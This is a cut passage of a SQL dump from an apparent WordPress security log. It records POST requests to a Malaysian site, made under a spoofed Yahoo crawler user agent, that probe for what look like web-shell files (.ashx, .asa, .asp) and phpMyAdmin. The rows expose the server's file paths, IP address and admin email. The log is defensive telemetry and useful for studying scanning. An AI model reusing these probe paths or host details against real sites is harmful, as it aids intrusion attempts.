http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.19.122.106\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.19.122.106\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/cache/qwea.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/cache/qwea.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XathFPVzlVwlNsD8qm@4TQAAAMQ\";s:12:\"REDIRECT_URL\";s:16:\"/cache/qwea.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62975\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/cache/qwea.ashx\";s:10:\"SCRIPT_URL\";s:16:\"/cache/qwea.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XathFPVzlVwlNsD8qm@4TQAAAMQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512596.4881\";s:12:\"REQUEST_TIME\";s:10:\"1571512596\";}}','notice','2019-10-19 19:16:38','2019-10-19 19:16:36',35339464,37142056,'http://bintara.com.my//cache/qwea.ashx',1,0,'58.19.122.106'),(28465,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//cache/qwea.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"159.226.156.48\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"159.226.156.48\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/cache/qwea.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/cache/qwea.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XathK-VzlVwlNsD8qm@4TwAAAMc\";s:12:\"REDIRECT_URL\";s:16:\"/cache/qwea.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62427\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/cache/qwea.ashx\";s:10:\"SCRIPT_URL\";s:16:\"/cache/qwea.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XathK-VzlVwlNsD8qm@4TwAAAMc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512619.9376\";s:12:\"REQUEST_TIME\";s:10:\"1571512619\";}}','notice','2019-10-19 19:17:01','2019-10-19 19:17:00',35265344,37066784,'http://bintara.com.my//cache/qwea.ashx',1,0,'159.226.156.48'),(28466,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"//phpmyadmin\";s:14:\"CONTENT_LENGTH\";s:3:\"301\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"219.243.236.130\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"219.243.236.130\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"http://bintara.com.my/phpmyadmin\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/phpmyadmin\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XathQY7-RFqMeLUZjgue@AAAAJg\";s:12:\"REDIRECT_URL\";s:11:\"/phpmyadmin\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"63464\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/phpmyadmin\";s:10:\"SCRIPT_URL\";s:11:\"/phpmyadmin\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XathQY7-RFqMeLUZjgue@AAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512642.0274\";s:12:\"REQUEST_TIME\";s:10:\"1571512642\";}}','notice','2019-10-19 19:17:23','2019-10-19 19:17:22',35260160,37054520,'http://bintara.com.my//phpmyadmin',1,0,'219.243.236.130'),(28467,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"//phpmyadmin\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"219.235.150.73\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"219.235.150.73\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"http://bintara.com.my/phpmyadmin\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/phpmyadmin\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XathhY7-RFqMeLUZjgue-AAAAIc\";s:12:\"REDIRECT_URL\";s:11:\"/phpmyadmin\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62723\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/phpmyadmin\";s:10:\"SCRIPT_URL\";s:11:\"/phpmyadmin\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XathhY7-RFqMeLUZjgue-AAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512709.3664\";s:12:\"REQUEST_TIME\";s:10:\"1571512709\";}}','notice','2019-10-19 19:18:31','2019-10-19 19:18:29',35266352,37078536,'http://bintara.com.my//phpmyadmin',1,0,'219.235.150.73'),(28468,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//com3.stb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"820\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.83.133.218\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.83.133.218\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/com3.stb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/com3.stb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xath-PVzlVwlNsD8qm@4gQAAAMY\";s:12:\"REDIRECT_URL\";s:13:\"/com3.stb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62416\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/com3.stb.asp\";s:10:\"SCRIPT_URL\";s:13:\"/com3.stb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xath-PVzlVwlNsD8qm@4gQAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512828.6778\";s:12:\"REQUEST_TIME\";s:10:\"1571512828\";}}','notice','2019-10-19 19:20:30','2019-10-19 19:20:29',35336464,37131392,'http://bintara.com.my//com3.stb.asp',1,0,'211.83.133.218'),(28469,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//com3.stb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"685\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"218.85.48.200\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"218.85.48.200\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/com3.stb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/com3.stb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatiDbP2yel5jEccgdeXcAAAAY4\";s:12:\"REDIRECT_URL\";s:13:\"/com3.stb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"110.187.88.85\";s:11:\"REMOTE_PORT\";s:5:\"62991\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/com3.stb.asp\";s:10:\"SCRIPT_URL\";s:13:\"/com3.stb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatiDbP2yel5jEccgdeXcAAAAY4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571512845.463\";s:12:\"REQUEST_TIME\";s:10:\"1571512845\";}}','notice','2019-10-19 19:20:48','2019-10-19 19:20:45',35659176,37461056,'http://bintara.com.my//com3.stb.asp',1,0,'218.85.48.200'),(28470,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//data/%236Ik1Qv.asa\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"202.8.150.227\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"202.8.150.227\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/data/#6Ik1Qv.asa\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/data/#6Ik1Qv.asa\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatiI4q@uz@DI827WH6w2wAAAU0\";s:12:\"REDIRECT_URL\";s:17:\"/data/#6Ik1Qv.asa\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.204.240\";s:11:\"REMOTE_PORT\";s:5:\"58339\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/data/#6Ik1Qv.asa\";s:10:\"SCRIPT_URL\";s:17:\"/data/#6Ik1Qv.asa\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatiI4q@uz@DI827WH6w2wAAAU0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512867.7775\";s:12:\"REQUEST_TIME\";s:10:\"1571512867\";}}','notice','2019-10-19 19:21:10','2019-10-19 19:21:08',35265056,37069032,'http://bintara.com.my//data/%236Ik1Qv.asa',1,0,'202.8.150.227'),(28471,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//data/%236Ik1Qv.asa\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"124.21.249.194\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"124.21.249.194\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/data/#6Ik1Qv.asa\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/data/#6Ik1Qv.asa\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XatiNvVzlVwlNsD8qm@4jQAAANc\";s:12:\"REDIRECT_URL\";s:17:\"/data/#6Ik1Qv.asa\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.204.240\";s:11:\"REMOTE_PORT\";s:5:\"58772\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/data/#6Ik1Qv.asa\";s:10:\"SCRIPT_URL\";s:17:\"/data/#6Ik1Qv.asa\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XatiNvVzlVwlNsD8qm@4jQAAANc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571512886.4054\";s:12:\"REQUEST_TIME\";s:10:\"1571512886\";}}','notice','2019-10-19 19:21:28','2019-10-19 19:21:26',35339640,37136984,'http://bintara.com.my//data/%236Ik1Qv.asa',1,0,'124.21.249.194'),(28472,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.25 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"130.185.156.57\";s:11:\"REMOTE_PORT\";s:5:\"35952\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XatnPfVzlVwlNsD8qm@52gAAAMQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571514174.5181\";s:12:\"REQUEST_TIME\";s:10:\"1571514174\";}}','notice','2019-10-19 19:42:57','2019-10-19 19:42:54',35316832,37125712,'https://bintara.com.my/?page_id=18',1,0,'130.185.156.57'),(28473,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:140:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 OPR/40.0.2308.81 (Edition 